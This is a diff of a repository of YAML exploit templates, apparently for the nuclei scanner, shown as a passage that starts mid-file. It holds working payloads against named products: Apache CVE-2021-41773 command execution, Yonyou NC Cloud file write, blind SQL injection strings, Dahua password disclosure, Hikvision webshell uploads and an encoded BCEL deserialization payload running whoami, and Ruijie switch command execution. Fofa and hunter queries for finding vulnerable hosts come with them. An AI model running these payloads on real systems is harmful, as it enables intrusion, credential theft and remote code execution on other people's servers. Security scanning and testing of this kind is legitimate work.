Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72 - matchers-condition: and matchers: - - type: word - part: body - words: - - "nologin" - - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code_1 == 200 && contains(body_1, 'upload file success')" + - "status_code_2 == 200 && contains(body_2, 'upload file success')" + - "status_code_3 == 200 && contains(body_3, '{{randstr}}')" + condition: and diff --git a/poc/remote_code_execution/rce-cve-2021-41773.yaml b/poc/remote_code_execution/rce-cve-2021-41773.yaml index f8fd2f8e57..bf20e22be5 100644 --- a/poc/remote_code_execution/rce-cve-2021-41773.yaml +++ b/poc/remote_code_execution/rce-cve-2021-41773.yaml @@ -4,11 +4,13 @@ info: author: RafaelCaria severity: critical tags: cve,cve2021,rce + requests: - method: POST path: - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' body: 'echo;id' + matchers: - type: regex part: body diff --git a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-jsinvoke-rce.yaml @@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file diff --git a/poc/sql/BlindSQL.yaml b/poc/sql/BlindSQL.yaml index 6fd8c3c79a..815cf7212b 100644 --- a/poc/sql/BlindSQL.yaml +++ b/poc/sql/BlindSQL.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec + author: 3rag severity: Critical description: Detects time-based blind SQL injection vulnerability http: @@ -11,12 +11,8 @@ http: payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - "if(now()=sysdate(),SLEEP(7),0)" - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" diff --git a/poc/sql_injection/BlindSQL.yaml b/poc/sql_injection/BlindSQL.yaml index 6fd8c3c79a..815cf7212b 100644 --- a/poc/sql_injection/BlindSQL.yaml +++ b/poc/sql_injection/BlindSQL.yaml @@ -1,7 +1,7 @@ id: time-based-sqli info: name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec + author: 3rag severity: Critical description: Detects time-based blind SQL injection vulnerability http: @@ -11,12 +11,8 @@ http: payloads: injection: - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - "if(now()=sysdate(),SLEEP(7),0)" - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" diff --git a/poc/sql_injection/yongyou-icurrtype-sqli.yaml b/poc/sql_injection/yongyou-icurrtype-sqli.yaml index 3debcda25e..219b23ef78 100644 --- a/poc/sql_injection/yongyou-icurrtype-sqli.yaml +++ b/poc/sql_injection/yongyou-icurrtype-sqli.yaml @@ -1,11 +1,9 @@ id: yongyou-jdbcRead - info: name: yongyou配置文件读取 author: Str1am severity: high tags: yongyou - requests: - raw: - | @@ -28,8 +26,6 @@ requests: - - matchers-condition: and matchers: - type: status @@ -39,4 +35,4 @@ requests: words: - "jdbc:" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/upload/Dahua_Video_FileUpload.yaml b/poc/upload/Dahua_Video_FileUpload.yaml index 1af31ba824..77936cf562 100644 --- a/poc/upload/Dahua_Video_FileUpload.yaml +++ b/poc/upload/Dahua_Video_FileUpload.yaml @@ -1,43 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform Video Arbitrary File Upload Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an arbitrary file upload vulnerability in the video interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to upload arbitrary files to the server and control server permissions + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" http: - - raw: - - | - POST /publishing/publishing/material/file/video HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 - Content-Length: 804 - Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7 - Accept-Encoding: gzip, deflate - Connection: close + - method: GET + path: + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Filedata"; filename="Test.jsp" - - Test - --dd8f988919484abab3816881c55272a7 - Content-Disposition: form-data; name="Submit" - - submit - --dd8f988919484abab3816881c55272a7-- - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "success")' - - 'contains(body_1, "path")' - condition: and + - type: word + part: body + words: + - "loginName" + - "loginPass" + + - type: status + status: + - 200 -# /publishingImg/VIDEO/230812152005170200.jsp +# 获取后访问地址 +# /admin/login_login.action diff --git a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml index cd961f6e81..e86e8491d1 100644 --- a/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/upload/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,27 +1,40 @@ id: HiKVISION info: - name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability - author: zerZero Trust Security Attack and Defense Laboratoryo - severity: medium + name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability + author: Zero Trust Security Attack and Defense Laboratory + severity: high description: | - There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks + There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets metadata: - fofa-query: app="HIKVISION-综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - method: GET - path: - - "{{BaseURL}}/artemis-portal/artemis/env" + - raw: + - | + POST /svm/api/external/report HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a - matchers-condition: and - matchers: - - type: word - part: body - words: - - "profiles" + ------WebKitFormBoundary9PggsiM755PLa54a + Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" + Content-Type: application/zip + + <%out.print("test");%> - - type: status - status: - - 200 + ------WebKitFormBoundary9PggsiM755PLa54a-- + - | + GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200' + - 'contains(body_1, "data")' + - 'status_code_2 == 200' + - 'contains(body_2, "test")' + condition: and diff --git a/poc/upload/Hikvision_iVMS-8700_upload.yaml b/poc/upload/Hikvision_iVMS-8700_upload.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml index 7e328a8b1b..7f081b05e0 100644 --- a/poc/upload/Hikvision_iVMS-8700_upload_action.yaml +++ b/poc/upload/Hikvision_iVMS-8700_upload_action.yaml @@ -1,50 +1,48 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files metadata: fofa-query: icon_hash="-911494769" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' + str3: '<%out.print("{{str2}}");%>' http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /eps/resourceOperations/upload.action HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" + User-Agent: MicroMessenger + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj + + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj + Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp" Content-Type: image/jpeg - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- + {{str3}} + ------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 + GET /eps/upload/{{res_id}}.jsp HTTP/1.1 Host: {{Hostname}} extractors: - type: json - name: name + name: res_id json: - ".data.resourceUuid" internal: true matchers: - - type: word - words: - - '{{randstr}}' + - type: dsl + dsl: + - body_2 == str2 diff --git a/poc/upload/Ruijie_NBR_Router_fileupload.yaml b/poc/upload/Ruijie_NBR_Router_fileupload.yaml index fa762ac2f6..f2db119795 100644 --- a/poc/upload/Ruijie_NBR_Router_fileupload.yaml +++ b/poc/upload/Ruijie_NBR_Router_fileupload.yaml @@ -1,37 +1,33 @@ id: Ruijie info: - name: Ruijie NBR Router fileupload.php Arbitrary File Upload Vulnerability + name: Ruijie Switch WEB Management System EXCU_ SHELL author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - Ruijie NBR router has an arbitrary file upload vulnerability in the fileupload.php file, which allows attackers to upload arbitrary files to the server and obtain server privileges + Ruijie Switch WEB Management System EXCU_ SHELL metadata: - fofa-query: app="Ruijie-NBR路由器" - hunter-query: web.title="锐捷网络 --NBR路由器--登录界面" + fofa-query: body="img/free_login_ge.gif" && body="./img/login_bg.gif" + hunter-query: web.body="img/free_login_ge.gif"&&body="./img/login_bg.gif" http: - raw: - | - POST /ddi/server/fileupload.php?uploadDir=../../321&name=test.php HTTP/1.1 + GET /EXCU_SHELL HTTP/1.1 Host: {{Hostname}} - Accept: text/plain, */*; q=0.01 - Content-Disposition: form-data; name="file"; filename="111.php" - Content-Type: image/jpeg + User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: close + Cmdnum: '1' + Command1: show running-config + Confirm1: n - - - | - GET /321/test.php HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - req-condition: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - - 'status_code_2 == 200' - - 'contains(body_1, "test.php")' - - 'contains(body_2, "PHP Version")' + - 'contains(body_1, "configuration")' condition: and